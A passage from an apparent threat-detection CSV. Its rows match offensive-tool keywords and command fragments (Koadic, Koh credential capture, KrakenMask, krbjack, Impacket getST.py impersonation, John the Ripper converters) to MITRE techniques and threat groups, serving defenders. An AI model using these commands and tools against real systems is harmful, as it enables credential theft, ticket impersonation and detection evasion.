coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*klsecservices*","offensive_tool_keyword","Github Username","exploitation tools for attackers","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/klsecservices","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*klsecservices/rpivot*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*knajdeaocbpmfghhmijicidfcmdgbdpm*","greyware_tool_keyword","Guru VPN & Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*knmmpciebaoojcpjjoeonlcjacjopcpf*","greyware_tool_keyword","Thunder Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*known_hosts2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Koadic.persist*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*koadic_load.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*koadic_net.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*koadic_process.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*koadic_types.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*koadic_util.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*koh filter add SID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh filter list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh filter remove SID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh filter reset*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh groups LUID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh impersonate LUID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh release all*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*koh release LUID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*Koh.exe capture*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*Koh.exe list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*Koh.exe monitor*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*kpiecbcckbofpmkkkdibbllpinceiihk*","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*krackattacks*","offensive_tool_keyword","krackattacks-scripts","This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper.","T1170 - T1555.003 - T1583.002","TA0003 - TA0007 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/vanhoefm/krackattacks-scripts","1","0","N/A","N/A","10","3233","783","2022-10-16T18:44:41Z","2017-10-18T12:58:08Z" +"*Kraken Mask by @DallasFR*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"*kraken.py --connect --mode * --profile * --compiler *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*KrakenMask-main*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"*krb2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*krb5/kerberosv5.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*krb5decoder*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*krb5-enum-users *","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*krb5-enum-users.*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*krbcredccache.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*krbjack -*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"*krbjack.tcpforward*","offensive_tool_keyword","krbjack","A Kerberos 